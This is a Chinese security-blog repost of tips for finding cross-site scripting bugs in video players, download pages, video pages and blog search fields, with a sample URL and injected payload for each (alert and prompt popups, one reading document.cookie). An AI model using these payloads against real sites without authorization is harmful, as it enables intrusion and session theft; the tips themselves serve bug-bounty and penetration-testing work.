记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

安全娱乐圈之攻防技术交流系列文章 第1弹

2021-04-14 00:52


“攻防技术交流”这一个系列的文章

主要记录日常实战与学习交流的攻防思路与心得体会

如果你有新奇的攻防idea

非常欢迎与小伙伴们一起分享交流

VX群暗号

后台回复“ 技术交流 ”获取

入群须知:

纯技术交流群禁止灌水

长期潜水不分享交流的会进行清理

希望大家予以理解


  XSS思路1  


在对某些播放器进行测试的时候,可以尝试对参数进行IODR,看看是否能直接引用到系统配置文件,也可以尝试XSS,进行弹窗。


http://xxx.xxx.xxx/xxx/xxx.swf?playerready=alert(document.domain)


  XSS思路2  


在文件下载页面,验证版本号的时候,可以尝试构造XSS payload。


http://xxx.xxx.xxx/xxx/xxxdownload/verify.asp?version=AC12%27%3E%3Cimg%20src=v%20onerror=alert(document.domain)%3E



  XSS思路3  


在视频播放页面,可以尝试对各个参数进行 XSS payload 构造,说不定就有意外惊喜。


http://xxx.xxx.xxx/video.asp?v=Acroxx1%22%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Es_aE&e=mp4&width=560&height=315



  XSS思路4  


在测试博客搜索功能时,对查询参数尝试构造XSS,当鼠标滑倒搜索按钮上时,触发payload造成XSS。


价值 $3500


https://xxx.xxx.xxx/blogsearch?q=OnMoUsEoVeR=prompt(/hacked/)//


星光不问赶路人,岁月不负有心人!

    加油,网安人!



知识来源: https://mp.weixin.qq.com/s?__biz=MzI1MjYyNTA4Mw==&mid=2247484132&idx=1&sn=c4f0ded4df7fb0056218691a480a4dae

阅读:75311 | 评论:0 | 标签:攻防 安全

想收藏或者和大家分享这篇好文章→复制链接地址

“安全娱乐圈之攻防技术交流系列文章 第1弹”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁